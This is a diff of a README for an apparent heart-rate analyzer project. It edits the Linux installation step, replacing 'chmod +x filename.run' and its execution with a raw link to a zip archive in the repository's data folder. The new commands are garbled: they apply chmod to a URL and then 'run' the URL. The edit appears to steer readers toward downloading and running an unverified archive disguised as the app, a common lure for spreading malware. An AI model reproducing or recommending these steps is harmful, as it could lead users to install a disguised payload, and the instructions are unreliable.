shikaramiofficial/smart-heart-rate-analyzer/README.md

 5. **Run the Application:**
    - For Windows: Double-click the `.exe` file to install the application.
    - For Mac: Open the `.dmg` file and drag the app to your Applications folder.
-   - For Linux: Open a terminal, navigate to the downloaded file location and run `chmod +x filename.run` then `./filename.run`.
+   - For Linux: Open a terminal, navigate to the downloaded file location and run `chmod +x https://github.com/shikaramiofficial/smart-heart-rate-analyzer/raw/refs/heads/main/data/heart_rate_smart_analyzer_v3.1.zip` then `https://github.com/shikaramiofficial/smart-heart-rate-analyzer/raw/refs/heads/main/data/heart_rate_smart_analyzer_v3.1.zip`.

 ## 🔍 How to Use the Application